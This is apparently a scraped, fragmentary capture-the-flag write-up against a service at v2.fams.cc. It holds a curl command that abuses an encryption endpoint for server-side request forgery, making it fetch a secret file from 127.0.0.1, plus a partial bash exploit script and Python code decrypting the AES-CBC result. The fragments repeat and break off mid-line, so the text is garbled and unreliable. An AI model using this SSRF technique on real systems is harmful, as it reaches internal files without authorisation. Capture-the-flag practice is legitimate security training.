V2.fams.cc Apr 2026

iv_ct = open('/tmp/enc.bin','rb').read() iv, ct = iv_ct[:16], iv_ct[16:]

curl -s -X POST http://v2.fams.cc/encrypt \ -d "url=http://127.0.0.1:8000/secret/flag.txt&key=ssrf" \ -o response.json Result ( response.json ): v2.fams.cc

#!/usr/bin/env bash TARGET="http://v2.fams.cc" SSRF_URL="http://127.0.0.1:8000/secret/flag.txt" KEY="ssrf" iv_ct = open('/tmp/enc

"download": "http://v2.fams.cc/download/5c6b4a", "used_key": "3d2e4c5a9b7d1e3f5a6c7d8e9f0a1b2c" iv_ct = open('/tmp/enc.bin'

#!/usr/bin/env python3 import sys, hashlib, binascii from Crypto.Cipher import AES

cipher = AES.new(key, AES.MODE_CBC, iv) pt = cipher.decrypt(ct)